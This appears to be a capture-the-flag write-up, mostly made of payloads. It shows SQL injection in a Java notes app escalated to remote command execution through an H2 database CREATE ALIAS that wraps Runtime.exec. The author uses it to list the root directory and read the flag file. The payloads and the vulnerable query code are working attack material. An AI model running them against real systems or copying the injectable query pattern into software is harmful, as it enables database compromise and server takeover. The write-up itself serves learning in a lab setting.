I found the creds user:123 in the source code. Analyzing the code I discovered a basic SQLi vulnerability:

String query = String.format("Select * from notes where name ='%s' ", name);

If we put: hello' OR 1=0 -- - weโ€™ve got it. I dumped all the tables, but didnโ€™t found anything, so I managed that might be something harder. Inspecting he source further I found that an H2 Java SQL database was in use:


So I searched for โ€œH2 database command injection through sqliโ€, and found this article

Basically, if I capture the petition with burp and Do intercept the petition I can modify the POST parameter and inject there an ALIAS:

  • First I create the alias:
SQL Injection' or 1=0; CREATE ALIAS FUCKED AS '  
String fucked(String cmd) throws java.io.IOException {  
ย  ย  java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");  
ย  ย  return s.hasNext() ? s.next() : "";  
}';-- -
  • Then I call it by inserting a command in the notes table (I spend two days to manage this out xd):
SQL Injection' OR 1=0; INSERT INTO notes (name, note) VALUES ('Command Output', FUCKED('id')); --
  • Then I performed a UNION SQLi to check if the command output was written to the table:
SQL Injection' OR 1=0 UNION SELECT * from notes -- -

BINGO, BANGO, BONGO! We got this!

So we can check the / directory for the flag (it name is random):

SQL Injection' OR 1=0; INSERT INTO notes (name, note) VALUES ('Command Output', FUCKED('ls /')); --

So in my case, the flag is called JN8fe3XRqTYK_flag.txt, so I cat it:

SQL Injection' OR 1=0; INSERT INTO notes (name, note) VALUES ('Command Output', FUCKED('cat /JN8fe3XRqTYK_flag.txt')); -- -

And got the flag!

Challenge completed!